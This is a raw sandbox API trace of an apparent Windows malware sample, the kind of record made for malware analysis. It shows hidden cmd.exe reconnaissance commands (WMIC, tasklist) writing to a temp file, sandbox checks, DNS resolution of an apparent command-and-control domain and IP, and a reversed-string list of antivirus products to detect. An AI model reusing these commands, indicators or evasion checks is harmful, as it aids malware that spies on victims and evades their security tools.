[0550.740] WSAStartup (in: wVersionRequired=0x101, lpWSAData=0x2e7328 | out: lpWSAData=0x2e7328) returned 0
[0550.752] gethostname (in: name=0x16e1eb, namelen=100 | out: name="Q9iATrkPrH") returned 0
[0550.786] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="Q9iATrkPrH", cbMultiByte=10, lpWideCharStr=0x16d130, cchWideChar=2047 | out: lpWideCharStr="Q9iATrkPrH") returned 10
[0550.786] WSACleanup () returned 0
[0550.803] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x2d7720, lpParameter=0x0, dwCreationFlags=0x0, lpThreadId=0x16e24c | out: lpThreadId=0x16e24c*=0x714) returned 0xd0
[0550.805] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="task", cbMultiByte=4, lpWideCharStr=0x16d1c0, cchWideChar=2047 | out: lpWideCharStr="taskp\x16") returned 4
[0550.805] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="msprotB7", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8
[0550.805] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="msprotB7", cchWideChar=8, lpMultiByteStr=0x1e8c1f0, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msprotB7", lpUsedDefaultChar=0x0) returned 8
[0550.805] LoadIconW (hInstance=0x0, lpIconName=0x7f00) returned 0x10027
[0550.805] LoadCursorW (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003
[0550.805] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="msprotB7", cbMultiByte=8, lpWideCharStr=0x16d170, cchWideChar=2047 | out: lpWideCharStr="msprotB7") returned 8
[0550.805] RegisterClassW (lpWndClass=0x16e208) returned 0xc104
[0550.805] CreateWindowExW (dwExStyle=0x10000, lpClassName="msprotB7", lpWindowName="", dwStyle=0x80, X=1, Y=1, nWidth=0, nHeight=0, hWndParent=0x0, hMenu=0x0, hInstance=0x2b0000, lpParam=0x0) returned 0x30110
[0550.809] NtdllDefWindowProc_W () returned 0x0
[0550.809] NtdllDefWindowProc_W () returned 0x1
[0550.813] NtdllDefWindowProc_W () returned 0x0
[0550.818] GetMessageW (lpMsg=0x16e590, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0)
[0596.784] NtdllDefWindowProc_W () returned 0x1
[0625.446] NtdllDefWindowProc_W () returned 0x1
Thread:
id = 225
os_tid = 0x6dc
Thread:
id = 226
os_tid = 0x714
[0550.818] GetTempPathW (in: nBufferLength=0x105, lpBuffer=0x227f8f6 | out: lpBuffer="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\") returned 0x25
[0550.818] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\11.dat", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43
[0550.818] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\11.dat", cchWideChar=43, lpMultiByteStr=0x1e7dad0, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\11.dat", lpUsedDefaultChar=0x0) returned 43
[0550.818] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\11.dat", cbMultiByte=43, lpWideCharStr=0x227e810, cchWideChar=2047 | out: lpWideCharStr="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\11.dat") returned 43
[0550.818] FindFirstFileW (in: lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\11.dat" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\11.dat"), lpFindFileData=0x227f8a0 | out: lpFindFileData=0x227f8a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x2c36fd, nFileSizeHigh=0x0, nFileSizeLow=0x227f8c0, dwReserved0=0x0, dwReserved1=0x227f8e8, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
[0550.819] Sleep (dwMilliseconds=0x2bf20)
[0560.843] ShellExecuteW (hwnd=0x0, lpOperation="open", lpFile="cmd.exe", lpParameters="/c WMIC PROCESS where name=\"wininit.exe\" get creationdate |more > %TEMP%\\~dr9078", lpDirectory=0x0, nShowCmd=0) returned 0x2a
[0561.511] Sleep (dwMilliseconds=0x2710)
[0571.529] GetTempPathW (in: nBufferLength=0x105, lpBuffer=0x227f8f6 | out: lpBuffer="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\") returned 0x25
[0571.530] ShellExecuteW (hwnd=0x0, lpOperation="open", lpFile="cmd.exe", lpParameters="/c tasklist /fo csv >> C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\~dr9078", lpDirectory=0x0, nShowCmd=0) returned 0x2a
[0571.613] LoadLibraryW (lpLibFileName="advapi32.dll") returned 0x7feff320000
[0571.614] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetUserNameW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12
[0571.614] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetUserNameW", cchWideChar=12, lpMultiByteStr=0x1e8c250, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetUserNameW", lpUsedDefaultChar=0x0) returned 12
[0571.614] GetProcAddress (hModule=0x7feff320000, lpProcName="GetUserNameW") returned 0x7feff331fd0
[0571.614] GetUserNameW (in: lpBuffer=0x227f9f6, pcbBuffer=0x227f9f0 | out: lpBuffer="kEecfMwgj", pcbBuffer=0x227f9f0) returned 1
[0571.616] GetTempPathW (in: nBufferLength=0x105, lpBuffer=0x227f8f6 | out: lpBuffer="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\") returned 0x25
[0571.616] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\23.bat", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43
[0571.616] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\23.bat", cchWideChar=43, lpMultiByteStr=0x1e7db20, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\23.bat", lpUsedDefaultChar=0x0) returned 43
[0571.616] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\23.bat", cbMultiByte=43, lpWideCharStr=0x227e810, cchWideChar=2047 | out: lpWideCharStr="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\23.bat") returned 43
[0571.616] FindFirstFileW (in: lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\23.bat" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\23.bat"), lpFindFileData=0x227f8a0 | out: lpFindFileData=0x227f8a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x2c36fd, nFileSizeHigh=0x0, nFileSizeLow=0x227f8c0, dwReserved0=0x0, dwReserved1=0x227f8e8, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
[0571.618] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="1136.dat", cbMultiByte=8, lpWideCharStr=0x227e7d0, cchWideChar=2047 | out: lpWideCharStr="1136.datȧ") returned 8
[0571.618] FindFirstFileW (in: lpFileName="1136.dat" (normalized: "c:\\windows\\system32\\1136.dat"), lpFindFileData=0x227f860 | out: lpFindFileData=0x227f860*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x2c0917, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x227f8c0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x2ba872, nFileSizeHigh=0x25, nFileSizeLow=0x227f890, dwReserved0=0x0, dwReserved1=0x2c367a, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
[0571.618] Sleep (dwMilliseconds=0xbb8)
[0571.641] Sleep (dwMilliseconds=0x0)
[0571.681] Sleep (dwMilliseconds=0xbb8)
[0571.822] Sleep (dwMilliseconds=0x0)
[0571.852] Sleep (dwMilliseconds=0xbb8)
[0571.878] Sleep (dwMilliseconds=0x1f40)
[0571.910] Sleep (dwMilliseconds=0xbb8)
[0571.918] Sleep (dwMilliseconds=0x7d0)
[0571.934] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="c:\\act\\13.dat", cbMultiByte=13, lpWideCharStr=0x227e6e0, cchWideChar=2047 | out: lpWideCharStr="c:\\act\\13.dat+") returned 13
[0571.934] FindFirstFileW (in: lpFileName="c:\\act\\13.dat" (normalized: "c:\\act\\13.dat"), lpFindFileData=0x227f770 | out: lpFindFileData=0x227f770*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x4a0048, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x3a1540, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x396e00, dwReserved0=0x0, dwReserved1=0x25, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
[0571.935] WSAStartup (in: wVersionRequired=0x101, lpWSAData=0x227f820 | out: lpWSAData=0x227f820) returned 0
[0571.944] gethostbyname (name="asper1.freeddns.org") returned 0x1d06f60*(h_name="asper1.freeddns.org", h_aliases=0x1d06f80*=0x0, h_addrtype=2, h_length=4, h_addr_list=0x1d06f88*=([0]="186.48.86.162"))
[0572.174] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="186", cbMultiByte=3, lpWideCharStr=0x227e530, cchWideChar=2047 | out: lpWideCharStr="186") returned 3
[0572.174] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="486", cbMultiByte=2, lpWideCharStr=0x227e530, cchWideChar=2047 | out: lpWideCharStr="486") returned 2
[0572.174] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="866", cbMultiByte=2, lpWideCharStr=0x227e530, cchWideChar=2047 | out: lpWideCharStr="866") returned 2
[0572.174] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="162", cbMultiByte=3, lpWideCharStr=0x227e530, cchWideChar=2047 | out: lpWideCharStr="162") returned 3
[0572.174] WSACleanup () returned 0
[0572.200] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="186.48.86.162", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13
[0572.200] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="186.48.86.162", cchWideChar=13, lpMultiByteStr=0x1e8c280, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="186.48.86.162", lpUsedDefaultChar=0x0) returned 13
[0572.200] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="1136.dat", cbMultiByte=8, lpWideCharStr=0x227e6a0, cchWideChar=2047 | out: lpWideCharStr="1136.dat\x02") returned 8
[0572.200] FindFirstFileW (in: lpFileName="1136.dat" (normalized: "c:\\windows\\system32\\1136.dat"), lpFindFileData=0x227f730 | out: lpFindFileData=0x227f730*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x1cf5590, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0xfb050000, ftLastWriteTime.dwLowDateTime=0x7fe, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x227f7f8, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
[0572.201] LoadLibraryW (lpLibFileName="user32.dll") returned 0x77a10000
[0572.201] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetLastInputInfo", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16
[0572.201] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetLastInputInfo", cchWideChar=16, lpMultiByteStr=0x1e8c2b0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetLastInputInfo", lpUsedDefaultChar=0x0) returned 16
[0572.201] GetProcAddress (hModule=0x77a10000, lpProcName="GetLastInputInfo") returned 0x77a262f4
[0572.201] GetLastInputInfo (in: plii=0x227f35c | out: plii=0x227f35c*(cbSize=0x8, dwTime=0x2075f)) returned 1
[0572.201] GetTickCount () returned 0x56362
[0572.201] FreeLibrary (hLibModule=0x77a10000) returned 1
[0572.201] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="0©w", cbMultiByte=1, lpWideCharStr=0x227e0e0, cchWideChar=2047 | out: lpWideCharStr="0Ƚ") returned 1
[0572.201] GetSystemPowerStatus (in: lpSystemPowerStatus=0x227f364 | out: lpSystemPowerStatus=0x227f364) returned 1
[0572.202] QueryPerformanceCounter (in: lpPerformanceCount=0x227f368 | out: lpPerformanceCount=0x227f368*=2115724159388) returned 1
[0572.202] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="00", cbMultiByte=2, lpWideCharStr=0x227dbe0, cchWideChar=2047 | out: lpWideCharStr="00") returned 2
[0572.202] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="XX", cbMultiByte=2, lpWideCharStr=0x227dbe0, cchWideChar=2047 | out: lpWideCharStr="XX") returned 2
[0572.202] GetTempPathW (in: nBufferLength=0x105, lpBuffer=0x227eb36 | out: lpBuffer="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\") returned 0x25
[0572.202] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\~dr9078", cchWideChar=44, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 44
[0572.202] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\~dr9078", cchWideChar=44, lpMultiByteStr=0x1e7db70, cbMultiByte=44, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\~dr9078", lpUsedDefaultChar=0x0) returned 44
[0572.202] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\~dr9078", cbMultiByte=44, lpWideCharStr=0x227da50, cchWideChar=2047 | out: lpWideCharStr="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\~dr9078") returned 44
[0572.202] FindFirstFileW (in: lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\~dr9078" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\~dr9078"), lpFindFileData=0x227eae0 | out: lpFindFileData=0x227eae0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x62dcea0, ftCreationTime.dwHighDateTime=0x1dab599, ftLastAccessTime.dwLowDateTime=0x62dcea0, ftLastAccessTime.dwHighDateTime=0x1dab599, ftLastWriteTime.dwLowDateTime=0x6bf32eb0, ftLastWriteTime.dwHighDateTime=0x1dab599, nFileSizeHigh=0x0, nFileSizeLow=0x41, dwReserved0=0x0, dwReserved1=0x227eb28, cFileName="~dr9078", cAlternateFileName="")) returned 0x3a3080
[0572.202] FindClose (in: hFindFile=0x3a3080 | out: hFindFile=0x3a3080) returned 1
[0572.202] Sleep (dwMilliseconds=0x3e8)
[0572.216] GetTempPathW (in: nBufferLength=0x105, lpBuffer=0x227eb36 | out: lpBuffer="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\") returned 0x25
[0572.216] CreateFileW (lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\~dr9078" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\~dr9078"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff
[0572.217] GetLastError () returned 0x20
[0572.217] LocalAlloc (uFlags=0x40, uBytes=0x214) returned 0x3be460
[0572.217] SleepEx (dwMilliseconds=0x64, bAlertable=1) returned 0x0
[0572.237] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="yksrepsak", cbMultiByte=9, lpWideCharStr=0x227dbe0, cchWideChar=2047 | out: lpWideCharStr="yksrepsak;\x7f") returned 9
[0572.237] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="exe.nrkek", cbMultiByte=8, lpWideCharStr=0x227dbe0, cchWideChar=2047 | out: lpWideCharStr="exe.nrkek;\x7f") returned 8
[0572.237] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="retsohsfk", cbMultiByte=8, lpWideCharStr=0x227dbe0, cchWideChar=2047 | out: lpWideCharStr="retsohsfk;\x7f") returned 8
[0572.237] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="namyshsfk", cbMultiByte=5, lpWideCharStr=0x227dbe0, cchWideChar=2047 | out: lpWideCharStr="namyshsfk;\x7f") returned 5
[0572.237] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="notronsfk", cbMultiByte=6, lpWideCharStr=0x227dbe0, cchWideChar=2047 | out: lpWideCharStr="notronsfk;\x7f") returned 6
[0572.237] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="tsavansfk", cbMultiByte=5, lpWideCharStr=0x227dbe0, cchWideChar=2047 | out: lpWideCharStr="tsavansfk;\x7f") returned 5
[0572.237] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="arivansfk", cbMultiByte=5, lpWideCharStr=0x227dbe0, cchWideChar=2047 | out: lpWideCharStr="arivansfk;\x7f") returned 5
[0572.237] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="exe.draugva", cbMultiByte=11, lpWideCharStr=0x227dbe0, cchWideChar=2047 | out: lpWideCharStr="exe.draugva") returned 11
[0572.237] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=" rivitnagva", cbMultiByte=8, lpWideCharStr=0x227dbe0, cchWideChar=2047 | out: lpWideCharStr=" rivitnagva") returned 8
[0572.237] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="exe.cvsgvaa", cbMultiByte=10, lpWideCharStr=0x227dbe0, cchWideChar=2047 | out: lpWideCharStr="exe.cvsgvaa") returned 10
[0572.237] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="iugvavsgvaa", cbMultiByte=5, lpWideCharStr=0x227dbe0, cchWideChar=2047 | out: lpWideCharStr="iugvavsgvaa") returned 5
[0572.237] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="eefacmsgvaa", cbMultiByte=6, lpWideCharStr=0x227dbe0, cchWideChar=2047 | out: lpWideCharStr="eefacmsgvaa") returned 6
[0572.237] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="exe.yartpva", cbMultiByte=10, lpWideCharStr=0x227dbe0, cchWideChar=2047 | out: lpWideCharStr="exe.yartpva") returned 10
[0572.237] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="dnertartpva", cbMultiByte=5, lpWideCharStr=0x227dbe0, cchWideChar=2047 | out: lpWideCharStr="dnertartpva") returned 5
[0572.237] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="setaicossa krowten", cbMultiByte=18, lpWideCharStr=0x227dbe0, cchWideChar=2047 | out: lpWideCharStr="setaicossa krowten") returned 18
[0572.237] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="exe.pvassa krowten", cbMultiByte=7, lpWideCharStr=0x227dbe0, cchWideChar=2047 | out: lpWideCharStr="exe.pvassa krowten") returned 7
[0572.237] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="adnapvassa krowten", cbMultiByte=5, lpWideCharStr=0x227dbe0, cchWideChar=2047 | out: lpWideCharStr="adnapvassa krowten") returned 5
[0572.237] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="exe.xsrgva krowten", cbMultiByte=10, lpWideCharStr=0x227dbe0, cchWideChar=2047 | out: lpWideCharStr="exe.xsrgva krowten") returned 10
[0572.237] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="cvsdwgvava krowten", cbMultiByte=8, lpWideCharStr=0x227dbe0, cchWideChar=2047 | out: lpWideCharStr="cvsdwgvava krowten") returned 8
[0572.238] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="exe.iugeva krowten", cbMultiByte=8, lpWideCharStr=0x227dbe0, cchWideChar=2047 | out: lpWideCharStr="exe.iugeva krowten") returned 8
[0572.238] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="exe.yartmabsrowten", cbMultiByte=12, lpWideCharStr=0x227dbe0, cchWideChar=2047 | out: lpWideCharStr="exe.yartmabsrowten") returned 12
[0572.238] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="exe.ssniwabsrowten", cbMultiByte=9, lpWideCharStr=0x227dbe0, cchWideChar=2047 | out: lpWideCharStr="exe.ssniwabsrowten") returned 9
[0572.238] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="exe.ssdbwabsrowten", cbMultiByte=8, lpWideCharStr=0x227dbe0, cchWideChar=2047 | out: lpWideCharStr="exe.ssdbwabsrowten") returned 8
[0572.238] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="exe.tnegadbsrowten", cbMultiByte=11, lpWideCharStr=0x227dbe0, cchWideChar=2047 | out: lpWideCharStr="exe.tnegadbsrowten") returned 11
[0572.238] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="exe.walccdbsrowten", cbMultiByte=9, lpWideCharStr=0x227dbe0, cchWideChar=2047 | out: lpWideCharStr="exe.walccdbsrowten") returned 9
[0572.238] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="exe.nomladbsrowten", cbMultiByte=9, lpWideCharStr=0x227dbe0, cchWideChar=2047 | out: lpWideCharStr="exe.nomladbsrowten") returned 9
[0572.238] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="sohposmladbsrowten", cbMultiByte=6, lpWideCharStr=0x227dbe0, cchWideChar=2047 | out: lpWideCharStr="sohposmladbsrowten") returned 6
[0572.238] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="exe.23mssfbsrowten", cbMultiByte=10, lpWideCharStr=0x227dbe0, cchWideChar=2047 | out: lpWideCharStr="exe.23mssfbsrowten") returned 10
[0572.238] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="exe.nomtnccprowten", cbMultiByte=12, lpWideCharStr=0x227dbe0, cchWideChar=2047 | out: lpWideCharStr="exe.nomtnccprowten") returned 12
[0572.238] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="atad gmtnccprowten", cbMultiByte=6, lpWideCharStr=0x227dbe0, cchWideChar=2047 | out: lpWideCharStr="atad gmtnccprowten") returned 6
[0572.238] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="exe.iuredipsrowten", cbMultiByte=12, lpWideCharStr=0x227dbe0, cchWideChar=2047 | out: lpWideCharStr="exe.iuredipsrowten") returned 12
[0572.238] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="exe.nom_popsrowten", cbMultiByte=10, lpWideCharStr=0x227dbe0, cchWideChar=2047 | out: lpWideCharStr="exe.nom_popsrowten") returned 10
[0572.238] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="bewrdom_popsrowten", cbMultiByte=5, lpWideCharStr=0x227dbe0, cchWideChar=2047 | out: lpWideCharStr="bewrdom_popsrowten") returned 5
[0572.238] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="eruces-fpopsrowten", cbMultiByte=8, lpWideCharStr=0x227dbe0, cchWideChar=2047 | out: lpWideCharStr="eruces-fpopsrowten") returned 8
[0572.238] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="hkciuq-fpopsrowten", cbMultiByte=6, lpWideCharStr=0x227dbe0, cchWideChar=2047 | out: lpWideCharStr="hkciuq-fpopsrowten") returned 6
[0572.238] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="sloot cppopsrowten", cbMultiByte=8, lpWideCharStr=0x227dbe0, cchWideChar=2047 | out: lpWideCharStr="sloot cppopsrowten") returned 8
[0572.238] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="exe.yartstcprowten", cbMultiByte=12, lpWideCharStr=0x227dbe0, cchWideChar=2047 | out: lpWideCharStr="exe.yartstcprowten") returned 12
[0572.238] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="erpivartstcprowten", cbMultiByte=5, lpWideCharStr=0x227dbe0, cchWideChar=2047 | out: lpWideCharStr="erpivartstcprowten") returned 5
[0572.238] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="namronrtstcprowten", cbMultiByte=6, lpWideCharStr=0x227dbe0, cchWideChar=2047 | out: lpWideCharStr="namronrtstcprowten") returned 6
[0572.238] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="exe.adnaztcprowten", cbMultiByte=9, lpWideCharStr=0x227dbe0, cchWideChar=2047 | out: lpWideCharStr="exe.adnaztcprowten") returned 9
[0572.238] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="suriv-itna acowten", cbMultiByte=13, lpWideCharStr=0x227dbe0, cchWideChar=2047 | out: lpWideCharStr="suriv-itna acowten") returned 13
[0572.238] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="exe.vsbewhsacowten", cbMultiByte=12, lpWideCharStr=0x227dbe0, cchWideChar=2047 | out: lpWideCharStr="exe.vsbewhsacowten") returned 12
[0572.238] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="exe.yartsrsacowten", cbMultiByte=10, lpWideCharStr=0x227dbe0, cchWideChar=2047 | out: lpWideCharStr="exe.yartsrsacowten") returned 10
[0572.238] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="exe.draug2aacowten", cbMultiByte=11, lpWideCharStr=0x227dbe0, cchWideChar=2047 | out: lpWideCharStr="exe.draug2aacowten") returned 11
